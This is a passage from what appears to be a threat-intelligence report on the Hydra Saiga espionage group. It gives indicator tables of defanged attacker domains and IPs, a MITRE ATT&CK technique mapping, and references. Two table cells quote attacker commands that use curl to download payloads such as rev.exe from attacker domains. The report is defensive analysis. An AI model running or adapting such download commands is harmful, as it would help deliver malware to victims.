| pweobmxdlboi[.]com | QHoster | 64[.]7[.]198[.]66 | `/cmd curl -o c:\users\я\appdata\local\rev.exe hxxps://pweobmxdlboi[.]com/sokcs.exe` – open directory hosting secondary payloads |
| qwadx[.]com | QHoster | 86[.]104[.]15[.]60 | `/go171 cmd /c curl -o C:\users\user\appdata\local\spoolsvc.rar hxxps://ss.qwadx[.]com/spoolsvc[.]rar` – open directory hosting secondary payloads |
Hydra Saiga MITRE ATT&CK Mapping
| Tactic | Technique Name | MITRE ID | Evidence from Report |
| --- | --- | --- | --- |
| Reconnaissance | Active Scanning | T1595 | Use of Censys and Shodan to scan for exposed servers. |
| Reconnaissance | Search Victim-Owned Websites | T1594 | Searching compromised government email inboxes for VPN configuration details. |
| Initial Access | Phishing: Malicious File | T1566.001 | Sending malicious attachments like ISO, RAR, or Word documents via email. |
| Initial Access | Valid Accounts | T1078 | Using credentials for webhosting providers to upload files to legitimate websites. |
| Execution | PowerShell | T1059.001 | Execution of PowerShell backdoors and scripts for C2 and post-exploitation. |
| Execution | Windows Management Instrumentation (WMI) | T1047 | Using WMI to execute a reverse socks5 proxy client on domain controllers. |
| Execution | Command and Scripting Interpreter: Python | T1059.006 | Use of custom Python-based implants and the Telemiris backdoor. |
| Execution | User Execution: Malicious File | T1204.002 | Victims opening malicious email attachments or decoy documents. |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 | Establishing persistence through a scheduled task named “WinUpdate”. |
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | Manipulating registry keys to ensure malware execution upon startup. |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Disabling features of Microsoft Defender and the Windows firewall. |
| Defense Evasion | Obfuscated Files or Information | T1027 | Use of Base64 encoding and obfuscated macros to hide malicious code. |
| Defense Evasion | Living off the Land | T1218 | Relying on standard Windows utilities like netsh, nltest, and bitsadmin. |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | Creating LSASS dumps to extract credentials. |
| Credential Access | Steal Web Browser Information | T1555.003 | Using custom Golang and Python tools to collect history, logins, and cookies. |
| Credential Access | Input Capture: GUI Input Capture | T1056.002 | Using the open-source tool FakeLogonScreen to capture victim passwords. |
| Credential Access | Modify Authentication Process: WDigest Authentication | T1556.002 | Enabling WDigest to store credentials in plaintext. |
| Discovery | Remote System Discovery | T1018 | Using nltest to discover domain controller addresses. |
| Discovery | Network Service Discovery | T1046 | Using Acunetix to find vulnerabilities in target web applications. |
| Lateral Movement | Remote Services: Windows Remote Management | T1021.006 | Utilizing WMI to execute processes remotely within a network. |
| Collection | Screen Capture | T1113 | Taking screenshots of infected machines using the PRTSC (Print Screen) key. |
| Collection | Archive Collected Data: Archive via Utility | T1560.001 | Packaging stolen documents and files into RAR archives for exfiltration. |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | Using the Telegram Bot API for C2 communication via HTTPS. |
| Command and Control | Protocol Tunneling | T1572 | Using tools like chisel and resocks to establish tunnels. |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Sending stolen data back through the Telegram-based command channel. |
| Exfiltration | Exfiltration Over Web Service | T1567 | Using curl to POST stolen files to an external exfiltration server. |
Resources
[1]: https://blog.talosintelligence.com/attributing-yorotrooper/
[2]: https://www.group-ib.com/blog/shadowsilk/
[3]: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/
[4]: https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
[5]: https://securelist.com/tomiris-new-tools/118143/
[6]: https://github.com/bitsadmin/fakelogonscreen
[7]: https://github.com/RedTeamPentesting/resocks
[8]: https://github.com/jpillora/chisel
[9]: https://github.com/HavocFramework/Havoc
[10]: https://eurasianet.org/kyrgyzstan-struggling-to-refill-toktogul-reservoir
[11]: https://caspiannews.com/news-detail/russia-kazakhstan-sign-memorandum-for-new-cross-border-gas-pipeline-project-2025-10-10-0/